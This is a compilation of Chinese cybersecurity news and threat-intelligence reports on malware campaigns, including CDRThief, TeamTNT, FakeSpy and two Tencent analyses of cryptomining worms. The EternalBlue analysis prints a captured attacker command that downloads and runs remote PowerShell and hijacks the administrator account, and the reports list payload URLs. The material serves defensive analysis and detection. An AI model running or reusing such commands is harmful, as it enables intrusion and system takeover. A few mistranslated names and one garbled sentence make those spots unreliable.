网络安全研究人员发现了一种名为“ CDRThief”的全新Linux恶意软件，该恶意软件针对IP语音（VoIP）软交换，旨在窃取电话元数据。ESET研究人员在周四的分析中说：“该恶意软件的主要目标是从受感染的软交换中窃取各种私人数据，包括呼叫详细记录（CDR）。” “要窃取此元数据，恶意软件会查询软交换使用的内部MySQL数据库。因此，攻击者充分了解了目标平台的内部体系结构。” 软交换（软件交换机的缩写）通常是VoIP服务器，允许电信网络提供对语音、传真、数据和视频流量以及呼叫路由的管理。 ESET的研究发现cdrreiver针对的是一个特定的Linux VoIP平台，即来自中国Linknat公司的VOS2009和3000软交换，并对其恶意功能进行加密，以逃避静态分析。 恶意软件首先试图从预先确定的目录列表中找到软交换配置文件，目的是访问MySQL数据库凭据，然后对其进行解密以查询数据库。 ESET的研究人员说，攻击者必须对平台二进制文件进行反向工程，以分析加密过程，并检索用于解密数据库密码的AES密钥，这表明作者对VoIP体系结构有“深入的了解”。 除了收集有关被破坏的Linknat系统的基本信息外，CDRthicker还过滤数据库的详细信息（用户名、加密密码、IP地址），并直接对MySQL数据库执行SQL查询，以便捕获与系统事件、VoIP网关和呼叫元数据相关的信息。 ESET说：“从e_syslog，e_gatewaymapping和e_cdr表中渗出的数据经过压缩，然后在渗出之前使用硬编码的RSA-1024公钥加密。因此，只有攻击者或操作员才能解密渗入的数据。” 从当前版本的ESET中可以很容易地将恶意软件的更新形式引入到其更新版本中，但这种恶意软件可能只会导致当前版本的数据更新。 也就是说，攻击者的最终目标或有关行动背后的攻击者的信息仍然不清楚。 “在撰写本文时，我们还不知道这些恶意软件是如何部署到被破坏的设备上的，”ESET的安东·切雷帕诺夫说我们推测攻击者可能会使用暴力攻击或利用漏洞来访问设备。” “这似乎是合理的假设，恶意软件是用于网络间谍活动。使用此恶意软件的攻击者的另一个可能目标是VoIP欺诈。由于攻击者获取有关VoIP软交换及其网关的活动信息，这些信息可用于执行国际收入分成欺诈（IRSF）。”     稿件与封面来源：The Hacker News，译者：芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理， 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

前言 2020年7月，NVISO检测到一组恶意Excel文档，也称为“ maldocs”，它们通过VBA激活的电子表格传递恶意软件。尽管我们曾见过恶意的VBA代码和掉落的有效载荷，但创建Excel文档本身的特定方式引起了我们的注意。 恶意Excel文档的创建者使用了一种技术，使他们无需实际使用Microsoft Office即可创建装载宏的Excel工作簿。但是在这种特定工作方式下，这些文档的检测率通常低于标准maldocs。 这篇文章概述了这些恶意文档的产生方式。此外，它简要描述了观察到的有效负载，最后以建议和危害指标结尾，以帮助保护组织免受此类攻击。   … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1328/ 消息来源：NVISO   ，封面来源：网络，译者：芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

根据信息安全研究员的一份最新报告，苹果意外批准了伪装成Adobe Flash播放器更新的常见恶意软件在macOS系统上运行。 信息安全研究员帕特里克·沃德尔（Patrick Wardle）指出，苹果批准的一款应用中包含知名恶意软件Shlayer中使用的代码。Shlayer是一款木马下载器，通过伪装成其他应用来传播，用户中招后会遭到大量广告的轰炸。反病毒公司卡巴斯基2019年表示，Shlayer是Mac电脑面临的“最常见威胁”。 沃德尔说，这是在苹果启动新的应用认证流程后，他首次听说苹果错误认证了恶意软件。苹果于2019年公布了macOS的应用认证流程，要求所有应用在macOS上运行前都要经过苹果的审核和开发者签名，即使这些应用来自Mac App Store以外。 在发现恶意软件之后，沃德尔联系了苹果。苹果随后禁用了与该应用相关的开发者帐号，吊销了对帐号的认证。有消息称，攻击者试图再次对该恶意软件进行认证，但苹果表示，各个版本的恶意软件认证都已被撤销。     （稿源：新浪科技，封面源自网络。）

即使没有可利用的软件漏洞，黑客也总是会找到入侵的方法。 FBI逮捕了一名俄罗斯公民，他最近前往美国，并向目标公司的一名员工行贿100万美元，以帮助他将恶意软件手动安装到该公司的计算机网络中。 8月1日至8月21日，27岁的Egor Igorevich Kriuchkov作为一名游客进入美国，他曾多次与内华达一家未透露姓名的公司的雇员会面，讨论这起阴谋，之后在洛杉矶被捕。 法庭文件提到： “大约在7月16日左右，Egor Igorevich Kriuchkov用他的WhatsApp帐户联系了受害公司的雇员，并安排亲自去内华达州探望。” “大约在7月28日左右，Egor Igorevich Kriuchkov使用了他的俄罗斯护照和B1 / B2旅游签证进入了美国。” Kriuchkov还要求员工通过分享有关公司基础架构的信息来参与定制恶意软件的开发。 根据美国司法部公布的法庭文件，Kriuchkov要求安装的恶意软件旨在从该公司的网络中提取数据，使攻击者能在以后威胁该公司，要求该公司支付赎金。 Kriuchkov和他在俄罗斯的同谋向该雇员承诺，在成功植入上述恶意软件后，将支付100万美元比特币，并提出对该公司网络发起DDoS攻击，以转移人们对该恶意软件的注意力。 “如果CHS1 [员工]同意这一安排，他们将提供用于插入电脑的u盘或带有恶意软件附件的电子邮件。” “身份不明的同谋讨论了支付雇员的各种方式，包括使用加密货币，担保人保证金或现金支付。” “在与联邦调查局联系后，Kriuchkov一夜之间从内华达州里诺开车到洛杉矶。克里奥科夫要求一位熟人为他购买飞机票，以试图飞出该国。” 在被联邦调查局逮捕后，联邦调查局对Kriuchkov及其会议进行了实时监视，Kriuchkov列出了该团伙之前针对的公司，并透露每一个目标公司中都有人在代表该团伙安装恶意软件。 我们需要注意的是，一些高调的勒索软件和数据泄露攻击很有可能是由内部人士以同样的方式实施的。 最终，Kriuchkov被控一项共谋罪，意图故意对受保护的计算机造成损害。     稿件与封面来源：The Hacker News，译者：芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理， 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

从本月初开始，Morphisec实验室跟踪了一个大规模的恶意软件活动，该活动提供QakBot / QBot银行木马。Qakbot利用先进的技术来逃避检测并阻止对威胁的人工分析。在这篇文章中，我们将提到其中两种有趣的技术——通过压缩Word文档绕过内容撤防和重建（CDR）技术、绕过子模式检测模式。   … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1308/ 稿件与封面来源：Morphisec，译者：芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理， 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

美国政府机构今天发布了一份恶意软件分析报告，披露了朝鲜黑客在针对美国政府承包商的攻击中远程访问木马（RAT）恶意软件的相关信息。该恶意软件称之为“BLINDINGCAN”，已经得到了网络安全和基础设施安全局（CISA）和联邦调查局（FBI）的确认。 这两个机构表示，该木马背后的黑客组织有朝鲜政府的资助，追踪到的黑客组织为HIDDEN COBRA（又名Lazarus Group 和 APT38）。根据各机构分析，该 RAT 自带 “用于远程操作的内置功能，可在受害者的系统上实现各种功能”。 在警告中写道：“CISA 共收到 4 个 Microsoft Word Open Extensible Markup Language (XML)文档（.docx），两个动态链接库（DLL）”。此外写道：“.docx 文档尝试连接到外部域中进行下载，提交的 32 位/ 64 位 DLL 分别安装名为 ‘iconcache.db’的 32 位/ 64 位 DLL。DLL ‘iconcache.db’会解压并执行 Hidden Cobra RAT 的功能”。 根据CISA和FBI的恶意软件分析结果，BLINDINGCAN恶意软件还可以从被入侵的系统中删除自己，并清理其痕迹以避免被检测等功能。     （稿源：cnBeta，封面源自网络）

安全研究专家近日发现了疑似首个加密挖矿恶意软件，可以从受感染的服务器中窃取 AWS 凭证。这种新型数据窃取功能是 TeamTNT（主要针对 Docker 安装的网络犯罪集团） 使用的恶意软件。 根据安全公司趋势科技今年早些时候发布的研究报告，该组织至少从 4 月开始就已经开始活跃。根据报告，TeamTNT 的运作方式是在互联网上扫描那些被错误配置的 Docker 系统，并在没有密码的情况下将其管理 API 暴露在互联网上。 该组织会访问 API，并在 Docker 安装内部署服务器，运行 DDoS 和加密挖掘恶意软件。根据英国安全公司 Cado Security 在8月17日发布的最新报告，这款恶意程序除了上述功能之外，还将攻击范围扩大到了 Kubernetes 安装。 虽然扩大目标通常是非常重要的，不过 Cado 研究人员表示该恶意程序还有一个更严重的功能，即扫描底层受感染服务器的任意亚马逊网络服务（AWS）凭证。 如果受感染的 Docker 和 Kubernetes 系统运行在 AWS 基础设施之上，TeamTNT 团伙就会扫描 ~/.aws/redentials 和 ~/.aws/config，并将这两个文件复制并上传到其命令和控制服务器上。这两个文件都没有加密，包含了底层AWS账户和基础设施的明文凭证和配置细节。     （稿源：cnBeta，封面源自网络）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/YXnmVzAFVD5fc6lQIFWE1A   一、背景 腾讯安全威胁情报中心检测到永恒之蓝下载器木马再次出现新变种，此次变种利用Python打包EXE可执行文件进行攻击，该组织曾在2018年底使用过类似手法。腾讯安全大数据监测数据显示，永恒之蓝下载器最新变种出现之后便迅速传播，目前已感染约1.5万台服务器，中毒系统最终用于下载运行门罗币挖矿木马。 永恒之蓝下载器木马在不断演进更新过程中，曾将EXE攻击方式逐步切换到利用Powershell脚本实现无文件攻击。在其功能越来越庞大之后，该黑产团伙再次将永恒之蓝漏洞攻击利用、mssql爆破攻击的代码重新添加到EXE木马中，并对Powershell中相关代码进行屏蔽。 被本次变种攻击失陷后的系统会下载if.bin、下载运行由随机字符串命名的EXE攻击模块进行大规模的漏洞扫描和攻击传播，同时会下载门罗币挖矿木马占用服务器大量CPU资源挖矿，会给受害企业造成严重生产力损失。 腾讯安全专家建议企业网管参考腾讯安全响应清单，对企业网络资产进行安全检测，以及时消除永恒之蓝下载器木马的破坏活动： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）永恒之蓝下载器木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测； 2）支持下发访问控制规则封禁目标端口，主动拦截永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796洞相关访问流量。 有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）云镜已支持永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796的检测； 2）已支持查杀利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796、Redis未授权访问漏洞入侵的挖矿木马、后门程序。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 漏洞扫描服务 （Vulnerability Scan Service，VSS） 1）腾讯漏洞扫描服务（VSS）已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2）已集成无损检测POC，企业可以对自身资产进行远程检测。 关于腾讯T-Sec漏洞扫描服务的更多信息，可参考：https://cloud.tencent.com/product/vss 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测； 2）对利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796协议特征进行识别检测； 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统（御点） 1）可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序； 2）企业终端管理系统已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3）企业终端管理系统已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序； 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力，关于T-Sec终端安全管理系统的更多资料，可参考：https://s.tencent.com/product/yd/index.html 更多产品信息，请参考腾讯安全官方网站https://s.tencent.com/ 附：永恒之蓝下载器木马历次版本更新情况如下： 时间 主要功能更新 2018年12月14日 利用“驱动人生”系列软件升级通道下载，利用“永恒之蓝”漏洞攻击传播。 2018年12月19日 下载之后的木马新增Powershell后门安装。 2019年1月9日 检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。 2019年1月24日 木马将挖矿组件、升级后门组件分别安装为计划任务，并同时安装Powershell后门。 2019年1月25日 木马在1月24日的基础上再次更新，将攻击组件安装为计划任务，在攻击时新增利用mimikatz搜集登录密码，SMB弱口令爆破攻击，同时安装Powershell计划任务和hta计划任务。 2019年2月10日 将攻击模块打包方式改为Pyinstaller。 2019年2月20日 更新矿机组件，下载释放XMRig矿机，以独立进程启动挖矿。 2019年2月23日 攻击方法再次更新，新增MsSQL爆破攻击。 2019年2月25日 在2月23日基础上继续更新，更新MsSQL爆破攻击时密码字典，添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击，同时使用黑客工具mimiktaz、psexec进行辅助攻击。 2019年3月6日 通过已感染机器后门更新Powershell脚本横向传播模块ipc。 2019年3月8日 通过已感染机器后门更新PE文件横向传播模块ii.exe，采用无文件攻击技术。该团伙使用的Powershell攻击代码与2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。 2019年3月14日 通过后门更新增肥木马大小、生成随机文件MD5逃避查杀，将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。 2019年3月28日 更新无文件攻击模块，更后新的攻击方式为：永恒之蓝漏洞攻击、弱口令爆破+WMIC、 Pass the hash+ SMBClient/SMBExec，并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。 2019年4月3日 开创无文件挖矿新模式：挖矿脚本由PowerShell下载在内存中执行。 2019年7月19日 无文件攻击方法新增CVE-2017-8464 Lnk漏洞利用攻击，感染启动盘和网络共享盘，新增MsSQL爆破攻击。 2019年10月9日 新增Bluekeep漏洞CVE-2019-0708检测上报功能。 2020年2月12日 使用DGA域名，篡改hosts文件。 2020年4月3日 新增钓鱼邮件传播，邮件附件urgent.doc包含Office漏洞CVE-2017-8570。 2020年4月17日 钓鱼邮件新增附件readme.zip、readme.doc，新增Bypass UAC模块7p.php，创建readme.js文件感染可移动盘、网络共享盘 2020年5月21日 新增SMBGhost漏洞CVE-2020-0796检测上报功能，新增SSH爆破代码（未调用）。 2020年6月10日 新增SMBGhost漏洞CVE-2020-0796利用攻击，新增SSH爆破、Redis爆破攻击Linux服务器并植入Linux平台挖矿木马。 2020年6月24日 重新使用Python打包EXE攻击模块20.dat(C:\Windows\Temp\<random>.exe)，负责永恒之蓝漏洞攻击、$IPC、SMB、mssql爆破攻击，其他攻击方式仍然通过Powershell实现。 二、样本分析 永恒之蓝下载器木马在Powershell攻击代码中，将扫描445端口进行攻击的$IPC爆破和永恒之蓝漏洞利用攻击功能进行了屏蔽。但以下功能仍然保留： 1.“永恒之蓝”漏洞利用MS17-010 2.Lnk漏洞利用CVE-2017-8464 3.Office漏洞利用CVE-2017-8570 4.RDP爆破 5.感染可移动盘、网络磁盘 6.钓鱼邮件（使用新冠病毒疫情相关主题） 7.SMBGhost漏洞利用CVE-2020-0796 8.SSH爆破攻击Linux系统 9.Redis未授权访问漏洞攻击Linux系统 然后在攻击后执行的Payload中添加一行代码，负责下载和执行EXE攻击模块 http[:]//d.ackng.com/ode.bin。 Ode.bin是经过加密的Powershell代码，解密后的内容主要完成以下功能： 生成4到8位字符组成的随机字符串作为文件名<random>.exe； 从http[:]//167.71.87.85/20.dat下载文件保存至C:\Windows\Temp\<random>.exe； 如果符合权限则创建计划任务”\Microsoft\Windows\<random>.exe “每50分钟执行一次20.dat，如果不符合权限则创建C:\Windows\Temp\\tt.vbs，通过VBS脚本代码创建计划任务“<random>.exe “，同样每50分钟执行一次20.dat。 通过计划任务执行的20.dat（拷贝至C:\Windows\Temp\<random>.exe md5: ef3a4697773f84850fe1a086db8edfe0）实际上是由Python代码打包的扫描攻击模块，与永恒之蓝下载器病毒2018年底第一次出现时的攻击模块C:\WINDOWS\Temp\svvhost.exe相似（参考https://www.freebuf.com/news/192015.html）。 该病毒在后来的逐步发展过程中，逐步将攻击代码转移到了Powershell实现，并且利用计划任务来动态获取和启动，不会在磁盘上留下文件，也就是“无文件攻击”模式攻击。而此次病毒重新启动exe攻击模块，可能是因为其功能不断扩展，需要将一部分代码进行分割，切割后的攻击模块及功能如下图所示。 If.bin中的Powershell攻击代码与上个版本相同，此处不再分析，分割出的xxx.exe中解码出Python实现的永恒之蓝漏洞攻击代码如下，另外还会执行$IPC、SMB、mssql弱口令爆破攻击： 攻击成功后执行shellcode 1、 下载和执行Powershell代码gim.jsp； 2、 修改administrator账户登陆密码为k8d3j9SjfS7并激活administrator账户； 3、 添加防火墙规则允许65529端口访问并开启监听。 cmd.exe /c netsh.exe firewall add portopening tcp 65529 DNS&netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53&powershell IEX(New-Object Net.WebClient).DownloadString(‘http[:]//t.amynx.com/gim.jsp’)&net user administrator k8d3j9SjfS7&net user administrator /active:yes gim.jsp是经过加密的Powershell代码，首先检测系统是否安装了以下杀软，如有调用卸载程序进行卸载： Eset、Kaspersky、avast、avp、Security、AntiVirus、Norton Security、Anti-Malware 然后安装一个计划任务“blackball”和一个随机名计划任务，定期下载和执行a.jsp（a.jsp继续下载和执行挖矿和攻击模块）。 IOCs Domain info.zz3r0.com info.amynx.com w.zz3r0.com IP 167.71.87.85 URL http[:]//167.71.87.85/20.dat http[:]//d.ackng.com/ode.bin http[:]//d.ackng.com/if.bin http[:]//t.amynx.com/gim.jsp http[:]//t.amynx.com/smgho.jsp http[:]//t.amynx.com/a.jsp md5 C:\Windows\Temp\<random>.exe ef3a4697773f84850fe1a086db8edfe0 8ec20f2cbad3103697a63d4444e5c062 ac48b1ea656b7f48c34e66d8e8d84537 d61d88b99c628179fa7cf9f2a310b4fb f944742b01606605a55c1d55c469f0c9 abd6f640423a9bf018853a2b40111f76 57812bde13f512f918a0096ad3e38a07 d8e643c74996bf3c88325067a8fc9d78 125a6199fd32fafec11f812358e814f2 fb880dc73e4db0a43be8a68ea443bfe1 8d46dbe92242a4fde2ea29cc277cca3f 48fbe4b6c9a8efc11f256bda33f03460 gim.jsp 98f48f31006be66a8e07b0ab189b6d02 a.jsp 6bb4e93d29e8b78e51565342b929c824 ode.bin e009720bd4ba5a83c4b0080eb3aea1fb if.bin 092478f1e16cbddb48afc3eecaf6be68 smgho.jsp ca717602f0700faba6d2fe014c9e6a8c 参考链接： 《“黑球”行动再升级，SMBGhost漏洞攻击进入实战》 https://mp.weixin.qq.com/s/ZoiKCTEaxhXIXsI4OzhWvA

据外媒BGR报道，一款名为FakeSpy的Android恶意软件重现江湖，目前主要目标是美国和西欧的用户。该应用能够窃取用户的短信、银行信息和应用数据。该恶意软件通过一条看似来自当地邮局的短信进行传播，并指示用户下载一款伪装成合法邮局应用的应用。 据Cybereason的一份新报告显示，一款名为FakeSpy的危险Android恶意软件已重新出现。FakeSpy是近三年前被安全研究人员首次发现的，是一款特别恶劣的恶意软件，旨在窃取用户的短信、财务数据、银行登录信息、应用数据、联系人列表等。 在最初的化身中，该应用的目标是韩国和日本的用户。不过最近，这款应用的野心更大了，现在开始针对全球的用户。目前，该恶意软件针对的一些国家包括中国、法国、德国、英国和美国。据悉，目前FakeSpy的迭代也比原来的版本更加强大和复杂，也就是说安卓用户要特别警惕，避免收到可疑信息。 FakeSpy的传播方式相当巧妙，首先是一条声称来自当地邮局的短信。短信中声称邮局试图投递一个包裹，但由于用户不在家而无法投递。然后，它提供了一个用户可以点击的链接，该链接引导用户下载一个伪装成合法邮政服务应用的应用程序。一旦安装在设备上，该应用就会将假短信以及恶意链接发送到用户的整个联系人列表中。 Cybereason补充道： 虚假应用是使用WebView构建的，WebView是Android的View类的一个流行扩展，可以让开发者显示一个网页。FakeSpy利用这个视图，在启动应用时将用户重定向到原来的邮局运营商网页，继续欺骗。这使得应用程序看起来合法，特别是考虑到这些应用程序的图标和用户界面。 一旦不知情的用户下载了假应用，恶意软件基本上就可以完全访问用户的设备。其中，它可以读取短信，发送短信，访问联系人信息，并从外部存储中读取。除此之外，该应用还特意寻找任何银行或加密货币相关的应用，以便窃取登录信息。 至于恶意软件的来源，研究人员称，所有迹象都指向一个名为 “Roaming Mantis “的组织。 Cybereason总结道： 恶意软件的作者似乎花了很大力气来改进这个恶意软件， 捆绑了许多新的升级，使其更加复杂、容易规避、装备精良。这些改进使FakeSpy成为市场上最强大的信息窃取者之一。我们预计这种恶意软件将继续发展，增加更多的新功能；现在唯一的问题是，我们何时才能看到下一波。     （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/oFnOODmShuuE5OUfbZKiEQ   一、背景 腾讯安全威胁情报中心检测到ThanatosMiner（死神矿工）挖矿木马利用BlueKeep漏洞CVE-2019-0708攻击传播。攻击者将公开的Python版本BlueKeep漏洞利用代码打包生成scan.exe，大范围扫描随机生成的IP地址进行探测和攻击。 漏洞利用成功后执行shellcode下载C#编写的木马svchost.exe，然后利用该木马下载门罗币挖矿木马以及攻击模块进行下一轮攻击。因Payload程序Assembly Name为ThanatosCrypt，将该挖矿木马命名为ThanatosMiner（死神矿工）。 2019年5月15日，微软发布了针对远程桌面服务（Remote Desktop Services ）的关键远程执行代码漏洞CVE-2019-0708的安全更新，该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞，便可以在目标系统上执行任意代码，该漏洞的触发无需任何用户交互操作——意味着，存在漏洞的电脑只需要连网，勿须任何操作即可能遭遇远程黑客攻击而沦陷。BlueKeep漏洞（CVE-2019-0708）是所有安全厂商高度重视的高危漏洞。 该漏洞影响旧版本的Windows系统，包括： Windows 7、WindowsServer 2008 R2、Windows Server 2008、Windows 2003、Windows XP。Windows 8和Windows10及之后版本不受此漏洞影响。 腾讯安全系列产品已全面支持对ThanatosMiner（死神矿工）挖矿木马的查杀拦截，腾讯安全专家强烈建议用户及时修补BlueKeep漏洞，避免电脑被挖矿木马自动扫描攻击后完全控制。 二、样本分析 攻击模块scan.exe通过pyinstaller打包Python代码生成exe，使用pyinstxtractor.py可解压出Python编译后的无后缀文件scan。pyinstaller在打包pyc的时候会去掉pyc的magic和时间戳，而打包的系统库文件中这两项内容会被保留，所以可以查看解压出的系统库中的magic和时间戳并添加到scan的文件头，然后将其命名为scan.pyc，并通过uncompyle6进行反编译，可以还原的Python代码scan.py。 分析发现，Python3版本编译后的二进制文件开头为e3 00 00 00 00 00 00 00，Python2版本通常为63 00 00 00 00 00 00 00。 scan.py获取本机同网段IP地址，以及随机生成的外网IP地址扫描3389端口。 利用公开的BlueKeep漏洞CVE-2019-0708攻击代码进行攻击。 漏洞攻击成功执行shellcode命令，在%Temp%目录下创建DO.vbs，下载执行http[:]//download.loginserv.net/svchost.exe。 Payload木马svchost.exe采样C#编写，代码经过Dotfuscator混淆处理，可使用开源工具De4dot去除部分混淆，程序的Assembly Name为ThanatosCrypt。 运行后会检测以下注册表项和磁盘文件判断是否在虚拟机中运行。 SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S SYSTEM\CurrentControlSet\Control\CriticalDeviceDatabase\root#vmwvmcihostdev SYSTEM\CurrentControlSet\Control\VirtualDeviceDrivers SOFTWARE\VMWare, Inc.\VMWare Tools SOFTWARE\Oracle\VirtualBox Guest Additions C:\windows\Sysnative\Drivers\Vmmouse.sys C:\windows\Sysnative\Drivers\vmci.sys C:\windows\Sysnative\Drivers\vmusbmouse.sys C:\windows\Sysnative\VBoxControl.exe 通过IsDebuggerPresent() 、IsDebuggerAttached()、CheckRemoteDebuggerPresent()判断进程是否被调试。 若无虚拟机环境、未处于被调试状态则继续执行。 然后svchost.exe继续下载http[:]//download.loginserv.net/scan.exe进行扫描攻击，以及下载http[:]//download.loginserv.net/xmrig.exe挖矿门罗币。 IOCs Domain download.loginserv.net MD5 URL http[:]//download.loginserv.net/svchost.exe http[:]//download.loginserv.net/xmrig.exe http[:]//download.loginserv.net/scan.exe http[:]//download.loginserv.net/mine.exe   参考链接 1.Windows远程桌面服务漏洞预警（CVE-2019-0708） https://mp.weixin.qq.com/s/aTSC0YR1dxSUHVJ3pnZezA 2.漏洞预警更新：Windows RDS漏洞（CVE-2019-0708） https://mp.weixin.qq.com/s/OEjI776O3cTjtMrsPdtnpQ 3.Windows远程桌面漏洞风险逼近，腾讯安全提供全面扫描修复方案 https://mp.weixin.qq.com/s/ckVHic2oChjZmVvH_zmsHA 4.Windows远程桌面服务漏洞（CVE-2019-0708）攻击代码现身 https://mp.weixin.qq.com/s/bcANAbzONFyrxqNMssTiLg 5.RDP漏洞(BlueKeep)野外利用预警，腾讯御知免费检测 https://mp.weixin.qq.com/s/G2ZS7rKkYYvEtbxUm0odGA 6.永恒之蓝下载器木马再升级，集成BlueKeep漏洞攻击能力 https://mp.weixin.qq.com/s/_teIut43g6In9YZ7VQ2f7w